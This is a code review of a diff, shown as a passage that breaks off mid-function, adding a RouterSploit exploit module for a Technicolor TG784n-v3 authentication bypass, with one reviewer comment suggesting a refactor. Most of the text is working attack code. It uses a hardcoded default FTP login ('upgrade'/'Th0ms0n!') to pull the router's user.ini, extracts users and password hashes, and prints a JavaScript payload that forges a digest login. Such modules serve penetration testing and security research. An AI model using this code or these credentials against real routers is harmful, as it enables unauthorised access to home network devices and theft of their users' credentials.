routersploit/modules/exploits/technicolor/tg784_authbypass.py

```diff
@@ -0,0 +1,152 @@
+import socket
+import telnetlib
+import re
+import ftplib
+from StringIO import StringIO
+
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    print_info,
+    mute,
+    validators,
+    print_table,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Technicolor TG784n-v3 auth bypass vulnerability.
+    If the target is vulnerable, it allows to bypass authentication.
+    """
+    __info__ = {
+        'name': 'Technicolor TG784n-v3 Auth Bypass',
+        'description': 'Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.',
+        'authors': [
+            'Jose Moreira',  # vulnerability discovery & analysis
+            '0BuRner',  # routersploit module
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # little fixes
+        ],
+        'references': [
+            'http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems',
+            'http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784',
+        ],
+        'devices': [
+            'Technicolor TG784n-v3',
+            'Unknown number of Technicolor and Thompson routers',
+        ]
+    }
+
+    target = exploits.Option('192.168.0.1', 'Target IP address e.g. 192.168.0.1', validators=validators.ipv4)
+
+    ftp_port = exploits.Option(21, 'Target FTP port')
+    telnet_port = exploits.Option(23, 'Target Telnet port')
+
+    remote_user = exploits.Option('upgrade', 'Default FTP username')
+    remote_pass = exploits.Option('Th0ms0n!', 'Default FTP password for "upgrade" user')
+
+    config_path = exploits.Option('user.ini', 'Path to config file')
+
+    def run(self):
+        response = self.telnet_login()
+        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
+            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
+            print_status("FTP and HTTP service active")
+            creds = self.ftp_get_config()
+
+            if creds:
+                print_status("Use javascript console (through developer tools) to bypass authentication:")
+                payload = ('var user = "{}"\n'
+                           'var hash2 = "{}";\n'
+                           'var HA2 = MD5("GET" + ":" + uri);\n'
+                           'document.getElementById("user").value = user;\n'
+                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
+                           'document.authform.submit();\n')
+
+                for user in creds:
+                    print_success("User: {} Role: {}".format(user[0], user[2]))
+                    print_info(payload.format(user[0], user[3]))
+
+        elif '}=>' in response:
```

Comment:
I would move this into `self.telnet_login()` and rewrite it so it returns `True` or `False`, that way we could simplify to:
```python
if self.telnet_login():
    print_success("Successful authentication through Telnet service")
    # ...
else:
    # bypass via ftp
```